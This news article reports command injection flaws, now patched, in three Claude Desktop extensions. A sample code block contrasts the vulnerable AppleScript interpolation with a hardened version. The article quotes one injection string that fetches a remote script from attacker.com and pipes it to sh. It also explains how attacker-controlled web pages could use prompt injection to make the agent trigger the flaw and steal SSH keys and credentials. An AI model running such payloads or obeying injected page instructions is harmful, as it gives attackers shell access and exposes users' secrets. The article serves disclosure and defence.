Claude Desktop Hit by Critical RCE Flaws Allowing Remote Code Execution

Security researchers have uncovered severe remote code execution vulnerabilities in three official Claude Desktop extensions developed and published by Anthropic.

The Chrome, iMessage, and Apple Notes connectors, which collectively boast over 350,000 downloads and occupy prominent positions in Claude Desktop’s extension marketplace, all contained the same critical security flaw: unsanitized command injection.

The vulnerabilities, confirmed by Anthropic as high-severity with a CVSS score of 8.9, have since been patched.

However, the incident serves as a stark reminder that even the most trusted developers can introduce critical security flaws that put enterprise systems at risk.

How the Vulnerability Works

The flaw stems from basic command injection, one of the oldest and most well-understood categories of software vulnerabilities.

Each affected MCP server accepted user-provided input and passed it directly into AppleScript commands without any sanitization or escaping. These AppleScript commands could then execute shell commands with full system privileges.

The Attacker Flow

When Claude was asked to perform simple tasks, such as opening a URL in Chrome, the extension would construct an AppleScript string using template literals, directly inserting the user-provided URL into the commands.

A maliciously crafted URL could escape the string context and inject arbitrary AppleScript commands.

For example, an attacker could inject code like “& do shell script “curl https://attacker.com/trojan | sh”&” which would result in arbitrary malicious code execution on the victim’s machine.
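The string-building pattern described above, next to a hardened form, as an added example that is not Anthropic's extension code. The function names and the sample URL are constructed for illustration, and the hardened form assumes `osascript` hands trailing arguments to the script's `on run argv` handler.

```javascript
// Added example; all names are hypothetical, not the extensions' real code.

// Vulnerable pattern: the URL is interpolated into AppleScript source, so a
// double quote in the input ends the string literal and the rest is parsed
// as AppleScript.
function buildVulnerableScript(url) {
  return `tell application "Google Chrome" to open location "${url}"`;
}

// Hardened pattern: the script text is a constant and the URL is handed over
// as data through the run handler's argv, never as source text.
const SAFE_SCRIPT = [
  'on run argv',
  'tell application "Google Chrome" to open location (item 1 of argv)',
  'end run',
];

function buildSafeInvocation(rawUrl) {
  const url = new URL(rawUrl); // throws on input that is not a URL
  if (url.protocol !== 'http:' && url.protocol !== 'https:') {
    throw new Error(`scheme not allowed: ${url.protocol}`);
  }
  // Meant for child_process.execFile(file, args): an argv array, no shell.
  const args = SAFE_SCRIPT.flatMap((line) => ['-e', line]);
  return { file: 'osascript', args: [...args, url.href] };
}

// Number of string-literal delimiters in the generated AppleScript source.
function countQuotes(script) {
  return (script.match(/"/g) || []).length;
}

// Constructed input: harmless, but it closes the literal and appends an
// expression, which is the same breakout the article describes.
const crafted = 'https://example.com/" & "INJECTED" & "';

console.log(buildVulnerableScript('https://example.com/'));
console.log(buildVulnerableScript(crafted));
console.log(buildSafeInvocation(crafted).args);
```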

The most concerning aspect of these vulnerabilities is how easily they could be exploited through prompt injection via web content.

Simulated attacker server code

Claude routinely fetches and reads web pages to answer user questions. An attacker controlling one of those pages could embed malicious instructions that exploit the vulnerable extensions.

Consider a user asking Claude a simple question, such as “Where can I play paddle in Brooklyn?” Claude searches the web, and if one result happens to be an attacker-controlled page, the server could detect Claude’s user agent and serve a hidden payload containing the malicious command injection.

From the user’s perspective, Claude would simply be doing its job. However, behind the scenes, the injected code could steal SSH keys and AWS credentials, exfiltrate session tokens, upload local code repositories, install persistent backdoors, or capture screenshots and keystrokes.

Unlike Chrome extensions, which run in sandboxed browser processes, Claude Desktop Extensions run fully unsandboxed with complete system permissions.

They can read any file, execute any command, access credentials, and modify system settings, as reported by security researchers.

This makes command injection vulnerabilities particularly dangerous, as the chain of trust from the chat client to the web content to local command execution effectively grants remote attackers local shell access.
